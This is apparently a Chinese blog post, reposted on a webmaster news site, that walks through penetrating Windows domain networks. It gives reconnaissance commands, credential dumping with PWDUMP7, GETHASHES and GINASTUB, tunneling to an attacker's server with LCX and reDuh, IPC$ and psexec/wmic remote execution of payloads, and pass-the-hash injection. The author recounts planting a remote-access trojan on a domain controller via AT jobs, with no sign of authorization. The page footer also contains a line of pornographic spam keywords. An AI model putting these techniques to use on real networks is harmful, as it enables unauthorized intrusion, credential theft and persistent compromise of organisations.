請登錄后使用快捷導(dǎo)航
沒有帳號？立即注冊

分享內(nèi)網(wǎng)滲透域的經(jīng)驗積累

2022-9-26 13:06| 查看: 2422 |來源: 互聯(lián)網(wǎng)

by Ra1nker .ipconfig /all //可以查看到當(dāng)前網(wǎng)卡配置信息，包括所屬域以及IP段這個命令可以看到：主機(jī)名字—shwdm，IP–192.168.103.8，網(wǎng)關(guān)IP—192.168.103.10,DNS 域名解析地址IP—192.168.100.1，主WINS服務(wù)器I

by Ra1nker
.ipconfig /all
//可以查看到當(dāng)前網(wǎng)卡配置信息，包括所屬域以及IP段
這個命令可以看到：主機(jī)名字—shwdm，IP–192.168.103.8，網(wǎng)關(guān)IP—192.168.103.10,DNS 域名解析地址IP—192.168.100.1，主WINS服務(wù)器IP—10.0.22.5
2.net view
//顯示正由指定的計算機(jī)共享的域、計算機(jī)或資源的列表。如果在沒有參數(shù)的情況下使用，則 net view 顯示當(dāng)前域中的計算機(jī)列表。
可以看到我們當(dāng)前域共有8臺機(jī)器，我們的這臺機(jī)器–SHWDM 也在其中
3.ping 機(jī)器名
//顯示該機(jī)器名的IP
如圖PING BJCWSERVER,我們得到這個名字叫BJCWSERVER的主機(jī)IP為192.168.103.50
4.net view /domain
//查看有多少域
5.net view /domain:testdomain（testdomain 假設(shè)為目標(biāo)的其中一個域）
//此命令是查看 testdomain域中的計算機(jī)列表
我們分別查看這三個域中的計算機(jī)列表，可以查到MYGROUP域下面只有一臺叫NCSERVER的機(jī)器，而且系統(tǒng)是LINUX的，是個SAMBA 服務(wù)器
6.net user /domain
//獲取所有域用戶列表
7.net group /domain
//獲取域用戶組信息
8.net group “domain admins” /domain
//查看與管理組成員
9.net user domain-admin /domain
//查看管理員登陸時間，密碼過期時間，是否有登陸腳本，組分配等信息！
10.net time /domain
//可以查看域時間，以及域服務(wù)器的名字（快速查找域的方法之一 By LCX）

總結(jié)下，通過這次信息收集，我們可以得到：

1.這個內(nèi)網(wǎng)的網(wǎng)關(guān)為 192.168.103.10,DNS 域名解析IP為192.168.100.1，主WINS服務(wù)器為10.0.22.5
2.一共有三個域，其中WORKGROUP域下面有8臺機(jī)器（本機(jī)亦屬其域），POLYCOMRSS 域下面有一臺，MYGROUP域下面有一臺SAMBA SERVER，系統(tǒng)是LINUX
1.收集信息。
1-1．不論什么途徑獲得的內(nèi)網(wǎng)機(jī)器，確定他在內(nèi)網(wǎng)后，我們首先就要了解這臺機(jī)器的所屬人員，如果我們的目標(biāo)是公司，那我們就要了解這個人在公司里的職位，他是個什么身份，有多大的權(quán)利，這都關(guān)系到他在內(nèi)網(wǎng)里的權(quán)限。因為，作為大公司，一個高權(quán)限的人他在內(nèi)網(wǎng) 里所要用到的東西就多，那么相對他的機(jī)器，當(dāng)然權(quán)限就會比一般普通員工的高很多，這在我的滲透過程中是常見的。
既然有了他的機(jī)器，那么翻翻他的電腦這是必要的，如果你說要怎么翻，你可以嘗試熟悉他的電腦甚至比他本人還熟，那你就算了解詳細(xì)了。一臺個人用的電腦，從上面翻出與他自己相關(guān)的一些信息，和大量公司信息應(yīng)該是沒有問題的，除非，這是臺新電腦。
1-2．了解了一定的人員信息，期間你要記下你所掌握到的賬號，密碼這些重要數(shù)據(jù)，以后有一定的用，所以，在你滲之前，不妨建個記事本將重要信息保存起來，寫個記事本不會浪費你多少時間。接下來，我們就應(yīng)該對這個網(wǎng)絡(luò)進(jìn)行一定的了解，他是一般的內(nèi)網(wǎng)，還是域？一般大公司都會用域的，我們只需要查一下就知道，要想對他進(jìn)行滲透，你就必須了解他的網(wǎng)絡(luò)拓補(bǔ)，當(dāng)然，一些太具體的物理上我們是無法了解的，我們只能了解我們所能知道的。不管他是INT，DMZ，LAN，我們必須足夠掌握。在這，我們就會用到一定的命令，相信大家應(yīng)該都很熟悉。
ipconfig /all 查詢一下本機(jī)的一些情況，IP段網(wǎng)關(guān) 屬于不屬于域
net view 查詢一些存在聯(lián)系的機(jī)器，一般以機(jī)器名顯示，我們需要對其PING出IP，一是方便查詢哪些重要機(jī)器的IP，二是方便查詢存在幾個段
net view /domain 查詢有幾個域因為大型網(wǎng)絡(luò)里面一般不止一個域的
net group /domain 查詢域里面的組
net user /domain 查詢域用戶
net group “domain admins” /domain 查詢域管理用戶組

這些都是我們需要了解的，當(dāng)然有時候還會需要再查詢一些信息，NET命令下你們都會找到，不需要我再重復(fù)，具體的情況具體分析問題。

2.信息歸檔

2-1。有了信息，我們就要對信息進(jìn)行一定的歸檔，將每個機(jī)器名所對應(yīng)的IP歸檔，方便用時不會亂。
2-2。查詢出的用戶，管理員，我們也必須歸檔。
2-3。查詢信息時可能出現(xiàn)的有利用價值信息必須歸檔。

3.技術(shù)利用

3-1。不論是通過鍵盤記錄。或者HASH的抓取，我們需要將賬號，密碼，郵箱，凡是涉及關(guān)鍵數(shù)據(jù)的全部保存，一方面是準(zhǔn)備滲透的資料，二是防止當(dāng)前利用機(jī)器會掉。
3-1-1。利用遠(yuǎn)控的鍵盤記錄進(jìn)行抓取。
3-1-2。利用PWDUMP7或者GETHASHES進(jìn)行抓取HASH，然后破解。GETHASHES V1.4后可以抓取域的全部HASH。
3-1-3。用GINASTUB.DLL獲取管理員的賬號和密碼。因為域管理員有權(quán)限登陸任何一臺機(jī)器。種上這個只是方便記錄他所登陸的密碼。INSTALL后，會在SYSYTEM32下生成一個 FAXMODE.INC 文件記錄密碼。
3-2。有了內(nèi)網(wǎng)，很多東西我們是沒有必要直接在當(dāng)前利用機(jī)器上操作的，別人雖然是內(nèi)網(wǎng)，但是不代表他沒有防御系統(tǒng)，所以，我們建立SOCKS或者VPN是很有必要的，建立SOCKS相信大家都會了吧。
3-2-1。我在這推薦 VIDC 這個工具，很方便，在CMD下直接操 VIDC.EXE -D -P PORT 就可以了。
3-2-2。在利用機(jī)器上使用LCX，CMD下 LCX.EXE -SLAVE 服務(wù)器IP PORT 127.0.0.1 PORT，然后到服務(wù)器上 CMD下 LCX.EXE -LISTEN 服務(wù)器IP PORT 任意PORT。
3-2-3。建立SOCKS后在本地可以用SOCKSCAP來進(jìn)行連接，成功連接后該操作什么就看你們自己了。

基本上我們就只能操作這么多了，后面已經(jīng)沒有什么技術(shù)上的再使用或利用，但是這中間的經(jīng)驗不少，所需要處理的細(xì)節(jié)也不少。
我們在得到內(nèi)網(wǎng)機(jī)器后，如果他存在域，但是沒有使用域賬號怎么辦？那我們只能查詢或者想盡一切手段獲得他常用的賬號密碼，然后利用這個賬號密碼，再通過SOCKS進(jìn)入域。這其中就關(guān)系到各位同行查看控制機(jī)器的文件，還有記錄密碼，GINA，HASH破解，這些都是必須的。

進(jìn)入域后，我們又該怎么做，建立SOCKS后又該怎么做。我們可以扔S上去查看主要的端口，我們可以對端口進(jìn)行弱口令的嘗試，我們可以針對內(nèi)網(wǎng)的WEB進(jìn)行檢測，方式很多，甚至你可以用MS08-067對另一臺機(jī)器進(jìn)行突破，但是相信我，能使用域的機(jī)器，大部分都是補(bǔ)丁打齊的。我們能利用的很少，但是不能灰心，只要能在內(nèi)網(wǎng)穿梭，我們至少在防御上會輕松很多，我們需要的只是耐心和時間。
一旦擁有密碼，我們就可以嘗試IPC連接，直接拿下域，這就得看你們的權(quán)限有多大。

net use \\IP\ipc$ password /user:username@domain

推薦使用這樣的方式輸入賬號和密碼，為什么？如果用戶名存在空格，你這樣輸會保險些。什么域用戶不能存在空格？
是的，以前我也認(rèn)為不會，微軟的講師也說不會，不過，經(jīng)過我的測試和經(jīng)驗，那是假的，域完全可以空格，除了 user name 這樣的，還可以存在　user na me ，不信　你可以試試。
建立IPC后，你只是想COPY文件　或者 RAR文件　再或者種馬　那就是你的自由了。
后話：最近因為在滲域，在滲透過程中，也確實出現(xiàn)一些問題，幾次都是不知如何進(jìn)行，其實在技術(shù)上，并沒有什么障礙。主要是在于對方有著比較強(qiáng)的主防御，而我的遠(yuǎn)控最開始連CMD都無法執(zhí)行，后經(jīng)過幾天的環(huán)境測試，突破了CMD。有了CMD后，進(jìn)行了查詢，獲得了一些信息，就開始了往下的滲透，被控機(jī)器的密碼我不是跑出來的，我是翻他的文件翻出他常用密碼的。因為他沒有使用域賬號，都是以系統(tǒng)賬號登陸，所以無法查看域。我只能用他的域賬號建立IPC連接，查找到內(nèi)網(wǎng)的一個WEB服務(wù)，將其滲透后才算拿下了一個穩(wěn)定的內(nèi)網(wǎng)機(jī)器。
拿下內(nèi)網(wǎng)WEB服務(wù)器后，我就已經(jīng)完全在域內(nèi)，沒有使用HASH INJECTION，我是先查詢了DOMAIN ADMINS，發(fā)現(xiàn)WEB服務(wù)器上的賬號就屬于這個組，PW后得到了HASH，破解掉我就連向了域控服務(wù)器的IPC$。

連接了IPC$，直接在其SYSYTEM32下扔了一個遠(yuǎn)控，然后用AT命令將其啟動，這期間我嘗試了5個SHIFT，但是SHIFT關(guān)閉后，我的遠(yuǎn)控也會掉，所以排除了這種方法，還是用AT來ADD NEW JOB 比較方便。
給域控服務(wù)器種了遠(yuǎn)控，利用CMD來GETHASHES了全部的HASHES進(jìn)行破解，很幸運(yùn)的查到了文件管理組的用戶，這才有了我后面的目標(biāo)達(dá)成。
總的來說，我這次的滲透比較運(yùn)氣好，中間麻煩事不是太多，不過也花了半個月的時間，時間大部分花在測試防御環(huán)境，軟件免殺，木馬免殺，查找資料這些上面。
后來，我獲取了他的網(wǎng)絡(luò)拓補(bǔ)圖，發(fā)現(xiàn)我所呆的區(qū)域只是一個小小的域，還有好幾個域我還沒有涉及到，在域的前面是DMZ，而DMZ前面當(dāng)然是INT了。
已經(jīng)很晚了，本來是在寫一份詳細(xì)的滲透過程，不過因為一直工作，很多細(xì)節(jié)沒有辦法當(dāng)場記錄，所以，暫時在BLOG上寫一些能想到的，后面如果有時間有環(huán)境，會再補(bǔ)充更多的細(xì)節(jié)以及圖片和在滲透時所遇到的麻煩，如何解決等寫出來。

常用命令
net view
查看同一域/工作組的計算機(jī)列表
net view /domain
查看域/工作組列表
net view /domain:Secwing
查看Secwing域中計算機(jī)列表
net group /domain
查看所在域的組
net user /domain
查看所在域用戶
net user /domain zerosoul 12345678
修改域用戶密碼，需要域管理員權(quán)限，或者Ctrl+Alt+Del點擊修改則不需要域管理員權(quán)限
net localgroup administrators SECWING\zerosoul /add
域Users組用戶添加到本地Administrators組，需要本地管理員或域管理員在本機(jī)登陸域后進(jìn)行
下面的命令只能用于域控制器:
net group “Domain controllers”
查看域控制器(如果有多臺)
net group
查看域的組
net group “domain admins”
查看域管理員
net group “domain users”
查看域管理員
PS:打開配置域控制器向?qū)У拿?
dcpromo
psexec /accepteula 繞過第一次驗證窗口
mstsc/admin 解決hash無法抓出問題
wmic /node:172.16.19.96 /user:ABIMAQ\Administrator /password:k78m90 process call create c:\kav\2009.exe
psexec.exe -s -u administrator -p k78m90 \\172.16.16.2 -c c:\kav\2009.exe 拷貝文件并且執(zhí)行
psexec.exe -s -u administrator -p km3h7i \\172.16.16.2 -c c:\kav\gsecdump.exe -u 抓取hash
net use \\172.16.16.2\IPC$ “k78m90″ /user:”admintitrator”
net use \\172.16.16.2\IPC$ “k78m90″ /user:”aABIMAQ\Administrator”
net time \\172.16.16.2
at \\172.16.16.2 13:50 2009.exe
java reDuhClient fdc1.cnhan.com http 80 /admin/reduh.aspx reduh連接命令
[createTunnel]1234:127.0.0.1:3389 端口轉(zhuǎn)向命令
iam-alt -h user-hash 這樣hash就被注入了
whosthere-alt.exe 來查看是否被注入成功。

本文最后更新于 2022-9-26 13:06，某些文章具有時效性，若有錯誤或已失效，請在網(wǎng)站留言或聯(lián)系站長：17tui@17tui.com

·END·

站長網(wǎng)微信號：w17tui，關(guān)注站長、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營銷服務(wù)中心

免責(zé)聲明：本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集，旨在傳播知識，文章和圖片版權(quán)歸原作者及原出處所有，僅供學(xué)習(xí)與參考，請勿用于商業(yè)用途，如果損害了您的權(quán)利，請聯(lián)系我們及時修正或刪除。謝謝！

下一篇：什么是CC攻擊，如何防止網(wǎng)站被CC攻擊的方法總匯上一篇：十種網(wǎng)絡(luò)攻擊行為介紹，您能頂住幾個？

17站長網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域，為您提供最新最全的互聯(lián)網(wǎng)資訊，幫助站長轉(zhuǎn)型升級，為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù)，與站長一起進(jìn)步！讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨！

掃一掃，關(guān)注站長網(wǎng)微信

青草久久影院-青草久久伊人-青草久久久-青草久久精品亚洲综合专区-SM双性精跪趴灌憋尿调教H-SM脚奴调教丨踩踏贱奴

分享內(nèi)網(wǎng)滲透域的經(jīng)驗積累

大家都在看

相關(guān)分類

熱門排行

最近更新